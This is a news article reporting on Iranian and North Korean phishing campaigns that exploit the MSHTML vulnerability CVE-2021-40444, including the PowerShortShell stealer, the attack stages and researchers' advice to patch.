Hackers Exploit MS Browser Engine Flaw Where UnpatchedMajority of Victims in Iranian Campaign Are Located in US, Researchers Say
An Iranian attacker has been targeting users who have failed to patch a remote code execution vulnerability in a Microsoft browser engine to spy on Farsi-speaking victims, say researchers at SafeBreach Labs.
The flaw in MSHTML - a proprietary browser engine for the Microsoft Windows version of Internet Explorer - has been designated CVE-2021-40444. It was patched in September (see: Microsoft Patches MSHTML Vulnerability).
The threat actors are using a new PowerShell stealer, called PowerShortShell, to carry out the attacks on unpatched systems, according to security firm SafeBreach Labs. The stealer gets its name because of its short, 153 lines of code, the researchers say.
The same vulnerability was also recently exploited by a North Korean attacker, says South Korean security company AhnLab. It says the attacker distributed the malicious files under the pretext of disseminating material about North Korea.
The Iranian campaign, being run by an unknown attacker since September, uses a new PowerShell stealer that has "powerful collection capabilities," says Tomer Bar, director of security research at SafeBreach.
The tool "provides the adversary a lot of critical information, including screen captures, Telegram files, document collection, and extensive data about the victim's environment," Bar says in the SafeBreach blog post.
Although the researchers don't know how many victims the campaign has amassed, Bar says that based on "the nature of the collected data, we assume that the victims might be Iranians who live abroad and might be seen as a threat to Iran's Islamic regime."
The firm says the majority of targets appear to be based in the U.S., followed by the Netherlands.
SafeBreach researchers note that the current attack campaign is a three-step process:
- First stage: A phishing mail containing a malicious Word attachment is sent to the victim, who is lured into opening it. The researchers observed two different Word documents - Mozdor[.]docx, which exploits the MSHTML vulnerability, and جنایات خامنه ای[.]docx or Khamenei Crimes[.]docx, which includes links to the Iranian news site Hamshahri Online and a Twitter account belonging to IranWire journalist Aida Ghajar.
- Second stage: The Word file exploits the MSHTML vulnerability, connects to the malicious server and then drops a malicious DLL to the %temp% directory on the victim's Windows-based computer.
- Third stage: The malicious DLL executes the PowerShortShell script, which then collects data and exfiltrates it to the attacker's command-and-control server.
The researchers noted a similar phishing campaign in July. In that case, the hackers stole Gmail and Instagram credentials of their victims, the researchers say.
The attackers used a phishing website with the address Deltaban[.]dedyn[.]io, to masquerade as the original Deltaban travel agency website. The data collected from this campaign was stored in an out[.]txt file, which was then sent to the same C2 server used in the current campaign, the researchers say.
North Korean Version
As with the Iranian campaign, the campaign being run by North Korean attackers is also distributing two Word documents files - one that mentions a seminar from the "Korea Institute for National Unification" and another that mentions "cross-border co-operation with Russia, China and North Korea," says AhnLab. The security firm first published details of the campaign on Nov. 22.
"It is noteworthy that the confirmed document files are all North Korea-related materials," AhnLab researchers say. The contents of the Word documents imply that the campaign is directed toward South Koreans, they add.
The modus operandi of these attackers parallels that of the Iranian attackers, in that it follows the same execution steps. But the researchers did not specify whether the intent of this campaign appeared to be data exfiltration.
AhnLab did not respond to Information Security Media Group's request for additional information.
With multiple attackers actively exploiting CVE-2021-40444, firms using Microsoft Office should immediately update their software to the latest version as a prevention measure, say researchers from EST Security, which discovered yet another campaign targeting the vulnerability. In this case, the campaign used communications that attempted to impersonate the president of North Korea's Pyongyang University of Science and Technology.
"The North Korean cyberthreat organization identified as the perpetrator behind this campaign is actively introducing document-based security vulnerabilities such as PDF and DOC files to customized targeted attacks such as CVE-2020-9715 and CVE-2021-40444," the EST Security researchers say. CVE-2020-9715 is a vulnerability that allows remote attackers to execute arbitrary code on affected installations of Adobe Acrobat Reader DC. User interaction is required to exploit this vulnerability in which the target victim must visit a malicious page or open a malicious file. The specific flaw exists within the handling of ESObject data objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process.